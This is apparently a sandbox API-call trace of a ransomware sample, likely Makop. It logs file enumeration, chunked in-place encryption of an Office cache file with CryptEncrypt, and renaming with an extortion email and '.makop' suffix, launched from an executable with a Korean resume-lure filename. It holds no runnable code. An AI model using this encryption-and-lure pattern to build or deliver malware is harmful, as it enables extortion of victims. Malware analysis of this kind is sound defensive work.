hFindFile=0x597fa0, lpFindFileData=0x245fa98 | out: lpFindFileData=0x245fa98*(dwFileAttributes=0x2013, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe7b42810, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe7b42810, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="..", cAlternateFileName="")) returned 1 [0129.972] FindNextFileW (in: hFindFile=0x597fa0, lpFindFileData=0x245fa98 | out: lpFindFileData=0x245fa98*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xa5cd3a40, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa5cd3a40, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="All Users", cAlternateFileName="ALLUSE~1")) returned 1 [0129.972] GetProcessHeap () returned 0x550000 [0129.972] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x22a) returned 0x594e90 [0129.972] GetProcessHeap () returned 0x550000 [0129.972] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x3c) returned 0x566d90 [0129.972] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\*.*", lpFindFileData=0x245f810 | out: lpFindFileData=0x245f810*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xa5cd3a40, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa5cd3a40, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x597fe0 [0130.087] GetProcessHeap () returned 0x550000 [0130.087] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x566d90 | out: hHeap=0x550000) returned 1 [0130.087] FindNextFileW (in: hFindFile=0x597fe0, lpFindFileData=0x245f810 | out: lpFindFileData=0x245f810*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xa5cd3a40, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa5cd3a40, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0130.222] FindNextFileW (in: hFindFile=0x597fe0, lpFindFileData=0x245f810 | out: lpFindFileData=0x245f810*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xecdfa490, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xee38cbf0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xee38cbf0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="{90140000-0016-0409-1000-0000000FF1CE}-C", cAlternateFileName="{90140~3")) returned 1 [0130.222] GetProcessHeap () returned 0x550000 [0130.222] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x23e) returned 0x5950c8 [0130.222] GetProcessHeap () returned 0x550000 [0130.222] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x8e) returned 0x56c7f0 [0130.222] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\*.*", lpFindFileData=0x245f588 | out: lpFindFileData=0x245f588*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xecdfa490, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xee38cbf0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xee38cbf0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x598020 [0130.223] GetProcessHeap () returned 0x550000 [0130.223] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x56c7f0 | out: hHeap=0x550000) returned 1 [0130.223] FindNextFileW (in: hFindFile=0x598020, lpFindFileData=0x245f588 | out: lpFindFileData=0x245f588*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xecdfa490, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xee38cbf0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xee38cbf0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0130.224] FindNextFileW (in: hFindFile=0x598020, lpFindFileData=0x245f588 | out: lpFindFileData=0x245f588*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x393df700, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x393df700, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xed035930, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x102fcbb, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="ExcelLR.cab", cAlternateFileName="")) returned 1 [0130.224] GetProcessHeap () returned 0x550000 [0130.224] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x290) returned 0x595310 [0130.224] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excellr.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0130.225] GetFileSizeEx (in: hFile=0x110, lpFileSize=0x245f508 | out: lpFileSize=0x245f508*=16972987) returned 1 [0130.225] GetProcessHeap () returned 0x550000 [0130.225] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x10) returned 0x566008 [0130.225] CryptGenRandom (in: hProv=0x564928, dwLen=0x10, pbBuffer=0x566008 | out: pbBuffer=0x566008) returned 1 [0130.225] SetFilePointerEx (in: hFile=0x110, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.225] WriteFile (in: hFile=0x110, lpBuffer=0x245f528*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x245f4f4, lpOverlapped=0x0 | out: lpBuffer=0x245f528*, lpNumberOfBytesWritten=0x245f4f4*=0x5, lpOverlapped=0x0) returned 1 [0130.228] CryptImportKey (in: hProv=0x564928, pbData=0x56ca58, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x245f4f8 | out: phKey=0x245f4f8*=0x598060) returned 1 [0130.228] CryptSetKeyParam (hKey=0x598060, dwParam=0x1, pbData=0x566008, dwFlags=0x0) returned 1 [0130.228] GetProcessHeap () returned 0x550000 [0130.228] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x40) returned 0x566d90 [0130.228] CryptEncrypt (in: hKey=0x598060, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x566d90*, pdwDataLen=0x245f4d8*=0x40, dwBufLen=0x40 | out: pbData=0x566d90*, pdwDataLen=0x245f4d8*=0x40) returned 1 [0130.228] CryptDestroyKey (hKey=0x598060) returned 1 [0130.228] WriteFile (in: hFile=0x110, lpBuffer=0x566d90*, nNumberOfBytesToWrite=0x40, lpNumberOfBytesWritten=0x245f4f4, lpOverlapped=0x0 | out: lpBuffer=0x566d90*, lpNumberOfBytesWritten=0x245f4f4*=0x40, lpOverlapped=0x0) returned 1 [0130.228] WriteFile (in: hFile=0x110, lpBuffer=0x245f4fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x245f4f4, lpOverlapped=0x0 | out: lpBuffer=0x245f4fc*, lpNumberOfBytesWritten=0x245f4f4*=0x4, lpOverlapped=0x0) returned 1 [0130.228] WriteFile (in: hFile=0x110, lpBuffer=0x566008*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x245f4f4, lpOverlapped=0x0 | out: lpBuffer=0x566008*, lpNumberOfBytesWritten=0x245f4f4*=0x10, lpOverlapped=0x0) returned 1 [0130.228] WriteFile (in: hFile=0x110, lpBuffer=0x569940*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x245f4f4, lpOverlapped=0x0 | out: lpBuffer=0x569940*, lpNumberOfBytesWritten=0x245f4f4*=0x80, lpOverlapped=0x0) returned 1 [0130.229] SetFilePointerEx (in: hFile=0x110, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x245f520 | out: lpNewFilePointer=0x0) returned 1 [0130.229] WriteFile (in: hFile=0x110, lpBuffer=0x245f510*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x245f4f4, lpOverlapped=0x0 | out: lpBuffer=0x245f510*, lpNumberOfBytesWritten=0x245f4f4*=0x8, lpOverlapped=0x0) returned 1 [0130.229] CryptImportKey (in: hProv=0x564928, pbData=0x56ca58, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x245f4f8 | out: phKey=0x245f4f8*=0x598060) returned 1 [0130.229] CryptSetKeyParam (hKey=0x598060, dwParam=0x1, pbData=0x566008, dwFlags=0x0) returned 1 [0130.229] SetFilePointerEx (in: hFile=0x110, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x245f4c8 | out: lpNewFilePointer=0x0) returned 1 [0130.229] ReadFile (in: hFile=0x110, lpBuffer=0x2250020, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x245f4bc, lpOverlapped=0x0 | out: lpBuffer=0x2250020*, lpNumberOfBytesRead=0x245f4bc*=0x40000, lpOverlapped=0x0) returned 1 [0130.239] CryptEncrypt (in: hKey=0x598060, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2250020*, pdwDataLen=0x245f4c4*=0x40000, dwBufLen=0x40000 | out: pbData=0x2250020*, pdwDataLen=0x245f4c4*=0x40000) returned 1 [0130.244] SetFilePointerEx (in: hFile=0x110, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.245] WriteFile (in: hFile=0x110, lpBuffer=0x2250020*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x245f4c0, lpOverlapped=0x0 | out: lpBuffer=0x2250020*, lpNumberOfBytesWritten=0x245f4c0*=0x40000, lpOverlapped=0x0) returned 1 [0130.246] SetFilePointerEx (in: hFile=0x110, liDistanceToMove=0x102fd94, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.246] WriteFile (in: hFile=0x110, lpBuffer=0x245f4c8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x245f4c0, lpOverlapped=0x0 | out: lpBuffer=0x245f4c8*, lpNumberOfBytesWritten=0x245f4c0*=0x8, lpOverlapped=0x0) returned 1 [0130.246] SetFilePointerEx (in: hFile=0x110, liDistanceToMove=0x56543e, lpNewFilePointer=0x0, dwMoveMethod=0x245f4c8 | out: lpNewFilePointer=0x0) returned 1 [0130.246] ReadFile (in: hFile=0x110, lpBuffer=0x2250020, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x245f4bc, lpOverlapped=0x0 | out: lpBuffer=0x2250020*, lpNumberOfBytesRead=0x245f4bc*=0x40000, lpOverlapped=0x0) returned 1 [0130.251] CryptEncrypt (in: hKey=0x598060, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2250020*, pdwDataLen=0x245f4c4*=0x40000, dwBufLen=0x40000 | out: pbData=0x2250020*, pdwDataLen=0x245f4c4*=0x40000) returned 1 [0130.253] SetFilePointerEx (in: hFile=0x110, liDistanceToMove=0x56543e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.253] WriteFile (in: hFile=0x110, lpBuffer=0x2250020*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x245f4c0, lpOverlapped=0x0 | out: lpBuffer=0x2250020*, lpNumberOfBytesWritten=0x245f4c0*=0x40000, lpOverlapped=0x0) returned 1 [0130.254] SetFilePointerEx (in: hFile=0x110, liDistanceToMove=0x102fd94, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.254] WriteFile (in: hFile=0x110, lpBuffer=0x245f4c8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x245f4c0, lpOverlapped=0x0 | out: lpBuffer=0x245f4c8*, lpNumberOfBytesWritten=0x245f4c0*=0x8, lpOverlapped=0x0) returned 1 [0130.254] SetFilePointerEx (in: hFile=0x110, liDistanceToMove=0xfefcc0, lpNewFilePointer=0x0, dwMoveMethod=0x245f4c8 | out: lpNewFilePointer=0x0) returned 1 [0130.254] ReadFile (in: hFile=0x110, lpBuffer=0x2250020, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x245f4bc, lpOverlapped=0x0 | out: lpBuffer=0x2250020*, lpNumberOfBytesRead=0x245f4bc*=0x40000, lpOverlapped=0x0) returned 1 [0130.258] CryptEncrypt (in: hKey=0x598060, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2250020*, pdwDataLen=0x245f4c4*=0x40000, dwBufLen=0x40000 | out: pbData=0x2250020*, pdwDataLen=0x245f4c4*=0x40000) returned 1 [0130.260] SetFilePointerEx (in: hFile=0x110, liDistanceToMove=0xfefcc0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.260] WriteFile (in: hFile=0x110, lpBuffer=0x2250020*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x245f4c0, lpOverlapped=0x0 | out: lpBuffer=0x2250020*, lpNumberOfBytesWritten=0x245f4c0*=0x40000, lpOverlapped=0x0) returned 1 [0130.261] SetFilePointerEx (in: hFile=0x110, liDistanceToMove=0x102fd94, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.261] WriteFile (in: hFile=0x110, lpBuffer=0x245f4c8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x245f4c0, lpOverlapped=0x0 | out: lpBuffer=0x245f4c8*, lpNumberOfBytesWritten=0x245f4c0*=0x8, lpOverlapped=0x0) returned 1 [0130.261] CryptDestroyKey (hKey=0x598060) returned 1 [0130.261] SetFilePointerEx (in: hFile=0x110, liDistanceToMove=0x102fd94, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.261] SetEndOfFile (hFile=0x110) returned 1 [0130.265] GetProcessHeap () returned 0x550000 [0130.265] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x566d90 | out: hHeap=0x550000) returned 1 [0130.265] GetProcessHeap () returned 0x550000 [0130.265] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x566008 | out: hHeap=0x550000) returned 1 [0130.265] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excellr.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab.[4B2E4630].[akzhq530@protonmail.com].makop" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excellr.cab.[4b2e4630].[akzhq530@protonmail.com].makop")) Process: id = "2" image_name = "이력서(20200609)_경력사항 기재하였으니 확인부탁드립니다 감사합니다.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\이력서(20200609)_경력사항 기재하였으니 확인부탁드립니다 감사합니다.exe" page_root = "0x3f967000" os_pid = "0xab0" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xa30" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\이력서(20200609)_경력사항 기재하였으니 확인부탁드립니다 감사합니다.exe\" n2608" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 3 os_tid = 0xaac [0052.451] GetVersion () returned 0x1db10106 [0052.451] GetCurrentProcess () returned 0xffffffff [0052.451] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0xf01ff, TokenHandle=0x18ff7c | out: TokenHandle=0x18ff7c*=0x78) returned 1 [0052.455] GetTokenInformation (in: TokenHandle=0x78, TokenInformationClass=0x14, TokenInformation=0x18ff80, TokenInformationLength=0x4, ReturnLength=0x18ff84 | out: TokenInformation=0x18ff80, ReturnLength=0x18ff84) returned 1 [0052.455] CloseHandle (hObject=0x78) returned 1 [0052.455] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\이력서(20200609)_경력사항 기재하였으니 확인부탁드립니다 감사합니다.exe\" n2608" [0052.455] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\이력서(20200609)_경력사항 기재하였으니 확인부탁드립니다 감사합니다.exe\" n2608", pNumArgs=0x18ff84 | out: pNumArgs=0x18ff84) returned 0x614728*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\이력서(20200609)_경력사항 기재하였으니 확인부탁드립니다 감사합니다.exe" [0052.455] GetProcessHeap () returned 0x600000 [0052.455] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x1) returned 0x610e20 [0052.455] GetProcessHeap () returned 0x600000 [0052.455] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x2c) returned 0x6147f0 [0052.455] CryptAcquireContextW (in: phProv=0x6147f0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6147f0*=0x614968) returned 1 [0052.478] GetProcessHeap () returned 0x600000 [0052.478] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa0) returned 0x6151d8 [0052.478] CryptImportKey (in: hProv=0x614968, pbData=0x18fef8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x6147f4 | out: phKey=0x6147f4*=0x614a80) returned 1 [0052.478] CryptDecrypt (in: hKey=0x614a80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6151d8, pdwDataLen=0x614818 | out: pbData=0x6151d8, pdwDataLen=0x614818) returned 1 [0052.479] CryptDestroyKey (hKey=0x614a80) returned 1 [0052.479] GetSystemWindowsDirectoryW (in: lpBuffer=0x419020, uSize=0x104 | out: lpBuffer="C:\\Windows") returned 0xa [0052.479] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x419228, nSize=0x400 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\이력서(20200609)_경력사항 기재하였으니 확인부탁드립니다 감사합니다.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\이력서(20200609)_경력사항 기재하였으니 확인부탁드립니다 감사합니다.exe")) returned 0x52 [0052.479] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x41a228, csidl=0, fCreate=0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0052.486] GetProcessHeap () returned 0x600000 [0052.487] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x8) returned 0x610e40 [0052.487] GetProcessHeap () returned 0x600000 [0052.487] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x10) returned 0x60f0e8 [0052.487] GetProcessHeap () returned 0x600000 [0052.487] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x20) returned 0x614380 [0052.487] CryptImportKey (in: hProv=0x614968, pbData=0x18ff00, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x6147f4 | out: phKey=0x6147f4*=0x615a28) returned 1 [0052.487] CryptDecrypt (in: hKey=0x615a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x614380, pdwDataLen=0x18ff68 | out: pbData=0x614380, pdwDataLen=0x18ff68) returned 1 [0052.487] CryptDestroyKey (hKey=0x615a28) returned 1 [0052.487] GetProcessHeap () returned 0x600000 [0052.487] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x20) returned 0x6143a8 [0052.487] CryptImportKey (in: hProv=0x614968, pbData=0x18ff00, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x6147f4 | out: phKey=0x6147f4*=0x615a28) returned 1 [0052.487] CryptDecrypt (in: hKey=0x615a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6143a8, pdwDataLen=0x18ff68 | out: pbData=0x6143a8, pdwDataLen=0x18ff68) returned 1 [0052.487] CryptDestroyKey (hKey=0x615a28) returned 1 [0052.487] GetProcessHeap () returned 0x600000 [0052.487] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x40) returned 0x615c20 [0052.487] CryptImportKey (in: hProv=0x614968, pbData=0x18ff00, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x6147f4 | out: phKey=0x6147f4*=0x615a28) returned 1 [0052.487] CryptDecrypt (in: hKey=0x615a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x615c20, pdwDataLen=0x18ff68 | out: pbData=0x615c20, pdwDataLen=0x18ff68) returned 1 [0052.487] CryptDestroyKey (hKey=0x615a28) returned 1 [0052.487] GetProcessHeap () returned 0x600000 [0052.487] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x80) returned 0x615c68 [0052.487] CryptImportKey (in: hProv=0x614968, pbData=0x18ff00, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x6147f4 | out: phKey=0x6147f4*=0x615a28) returned 1 [0052.487] CryptDecrypt (in: hKey=0x615a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x615c68, pdwDataLen=0x18ff6c | out: pbData=0x615c68, pdwDataLen=0x18ff6c) returned 1 [0052.487] CryptDestroyKey (hKey=0x615a28) returned 1 [0052.487] GetProcessHeap () returned 0x600000 [0052.487] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x14) returned 0x615a28 [0052.487] GetProcessHeap () returned 0x600000 [0052.487] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xd) returned 0x615d08 [0052.487] GetProcessHeap () returned 0x600000 [0052.487] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x1f) returned 0x6143d0 [0052.488] GetProcessHeap () returned 0x600000 [0052.488] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x1e) returned 0x6143f8 [0052.488] GetProcessHeap () returned 0x600000 [0052.488] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xd) returned 0x615d20 [0052.488] GetProcessHeap () returned 0x600000 [0052.488] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x18) returned 0x615a48 [0052.488] GetModuleHandleA (lpModuleName="Kernel32.dll") returned 0x76d30000 [0052.488] GetProcAddress (hModule=0x76d30000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x76d5d650 [0052.488] GetModuleHandleA (lpModuleName="Kernel32.dll") returned 0x76d30000 [0052.488] GetProcAddress (hModule=0x76d30000, lpProcName="Wow64RevertWow64FsRedirection") returned 0x76d5d668 [0052.488] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77710000 [0052.488] GetProcAddress (hModule=0x77710000, lpProcName="CreateProcessWithTokenW") returned 0x7775531f [0052.488] GetProcessHeap () returned 0x600000 [0052.489] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x615c68 | out: hHeap=0x600000) returned 1 [0052.489] GetProcessHeap () returned 0x600000 [0052.489] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x615d08 | out: hHeap=0x600000) returned 1 [0052.489] GetProcessHeap () returned 0x600000 [0052.489] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6143d0 | out: hHeap=0x600000) returned 1 [0052.489] GetProcessHeap () returned 0x600000 [0052.489] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6143f8 | out: hHeap=0x600000) returned 1 [0052.489] GetProcessHeap () returned 0x600000 [0052.489] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x615d20 | out: hHeap=0x600000) returned 1 [0052.489] GetProcessHeap () returned 0x600000 [0052.489] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x615a48 | out: hHeap=0x600000) returned 1 [0052.489] GetProcessHeap () returned 0x600000 [0052.489] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x615a28 | out: hHeap=0x600000) returned 1 [0052.489] GetLocaleInfoW (in: Locale=0x800, LCType=0x58, lpLCData=0x18ff58, cchData=32 | out: lpLCData="\x03") returned 16 [0052.489] GetProcessHeap () returned 0x600000 [0052.489] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x4) returned 0x614ab0 [0052.489] GetProcessHeap () returned 0x600000 [0052.489] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xa0) returned 0x6160f0 [0052.489] CryptImportKey (in: hProv=0x614968, pbData=0x18fee0, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x6147f4 | out: phKey=0x6147f4*=0x615a28) returned 1 [0052.489] CryptDecrypt (in: hKey=0x615a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6160f0, pdwDataLen=0x18ff48 | out: pbData=0x6160f0, pdwDataLen=0x18ff48) returned 1 [0052.490] CryptDestroyKey (hKey=0x615a28) returned 1 [0052.490] GetProcessHeap () returned 0x600000 [0052.490] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x8) returned 0x615a28 [0052.490] GetProcessHeap () returned 0x600000 [0052.490] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x12) returned 0x615a38 [0052.490] GetProcessHeap () returned 0x600000 [0052.490] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x8) returned 0x615a58 [0052.490] GetProcessHeap () returned 0x600000 [0052.490] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x1a) returned 0x6143f8 [0052.490] GetProcessHeap () returned 0x600000 [0052.490] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x8) returned 0x615c68 [0052.490] GetProcessHeap () returned 0x600000 [0052.490] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xc) returned 0x615d08 [0052.490] GetProcessHeap () returned 0x600000 [0052.490] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x8) returned 0x615c78 [0052.490] GetProcessHeap () returned 0x600000 [0052.490] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x1a) returned 0x6143d0 [0052.490] GetProcessHeap () returned 0x600000 [0052.490] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x8) returned 0x615c88 [0052.490] GetProcessHeap () returned 0x600000 [0052.490] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xe) returned 0x615d20 [0052.490] GetProcessHeap () returned 0x600000 [0052.490] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x8) returned 0x6161b0 [0052.490] GetProcessHeap () returned 0x600000 [0052.490] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x26) returned 0x615c98 [0052.490] GetProcessHeap () returned 0x600000 [0052.490] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x8) returned 0x6161c0 [0052.490] GetProcessHeap () returned 0x600000 [0052.490] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x18) returned 0x615cc8 [0052.490] GetProcessHeap () returned 0x600000 [0052.490] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6160f0 | out: hHeap=0x600000) returned 1 [0052.490] GetProcessHeap () returned 0x600000 